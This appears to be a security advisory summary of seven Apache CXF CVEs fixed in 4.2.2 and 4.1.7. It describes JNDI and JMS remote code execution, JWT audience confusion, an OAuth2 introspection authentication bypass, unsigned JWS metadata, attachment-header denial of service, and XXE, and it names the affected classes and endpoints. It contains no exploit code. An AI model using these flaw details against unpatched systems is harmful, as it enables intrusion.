Apache CXF: Seven CVEs Disclosed Together, Including Two RCE Flaws and an Auth Bypass

Key findings

• Seven CVEs disclosed together for Apache CXF on June 12, 2026
• Two high-severity RCE bugs: JNDI injection (CVE-2026-50633) and incomplete JMS fix (CVE-2026-50632)
• Token confusion flaw (CVE-2026-50627) lets JWTs be replayed across resource servers
• Authentication bypass in OAuth2 introspection endpoint (CVE-2026-50623) due to missing throw keyword
• XXE vulnerability (CVE-2026-49875) via unhardened SAXParserFactory
• All issues fixed in CXF 4.2.2 and 4.1.7; no workarounds available

On June 12, 2026, the Apache CXF project disclosed seven distinct vulnerabilities spanning denial of service, authentication bypass, token confusion, JNDI injection, and XML external entity (XXE) processing. The batch, fixed in releases 4.2.2 and 4.1.7, affects all earlier versions of the popular open-source services framework and includes two high-severity flaws rated CVSS 8.1 that could lead to remote code execution under specific conditions.

**JNDI injection and incomplete JMS fix (CVE-2026-50633, CVE-2026-50632)** Two of the most severe issues target Apache CXF's Java Connector Architecture (JCA) integration and JMS configuration handling. CVE-2026-50633 (CVSS 8.1) is a JNDI injection vulnerability in the JCA module — an attacker who can manipulate the deployment descriptor (ra.xml) or runtime activation parameters can achieve code execution. CVE-2026-50632 (CVSS 8.1) is a further incomplete fix for the previously disclosed CVE-2026-44417, which also involved untrusted JMS configuration leading to RCE. Together, these two CVEs underscore that Apache CXF's integration points remain a high-risk attack surface when untrusted users can supply configuration data.

**Token confusion and authentication bypass (CVE-2026-50627, CVE-2026-50623)** Two flaws in CXF's OAuth2 and JWT handling weaken access control. CVE-2026-50627 describes a missing audience (aud) claim validation in the JwtAccessTokenValidator class, enabling token confusion or routing attacks — a JWT issued for one resource server can be replayed against a different server. CVE-2026-50623 (CVSS 6.5) is an authentication bypass in the OAuth2 TokenIntrospectionService caused by a missing throw keyword in the security context check, allowing any unauthenticated network attacker to reach the introspection endpoint (/services/oauth2/introspect). While the advisory notes this is a safeguard-only control, its absence removes a defense layer.

**Unvalidated metadata processing (CVE-2026-50634)** Rated Medium (CVSS 6.5), CVE-2026-50634 affects the JwsJsonContainerRequestFilter. The vulnerability allows CXF to process metadata — such as Content-Type or protected HTTP headers — that was not authenticated by the accepted JWS signature. This can let an attacker bypass the application's assumption that such metadata came from a verified signature entry.

**Denial of service via attachment headers (CVE-2026-50645)** CVE-2026-50645 (CVSS 7.5) imposes no restriction on the number of attachment headers a message can contain during deserialization, enabling uncontrolled resource consumption and denial of service. The fix introduces a default maximum limit.

**XXE via missing SAXParser hardening (CVE-2026-49875)** The EndpointReferenceUtils and W3CMultiSchemaFactory classes construct a SAXParserFactory without the necessary JAXP hardening configurations, enabling out-of-band (OOB) external entity resolution. This XXE flaw could be used to exfiltrate data or probe internal networks.

Response and remediation All seven vulnerabilities are addressed in Apache CXF versions 4.2.2 and 4.1.7. Users running any earlier release — including all 4.0.x, 3.x, and older branches — should upgrade immediately. No workarounds have been published for individual CVEs; the Apache CXF team recommends applying the latest patched release as the sole mitigation. Given the inclusion of two RCE-class bugs (CVE-2026-50633, CVE-2026-50632) and an authentication bypass (CVE-2026-50623), organizations using CXF in internet-facing or multi-tenant deployments should prioritize the update.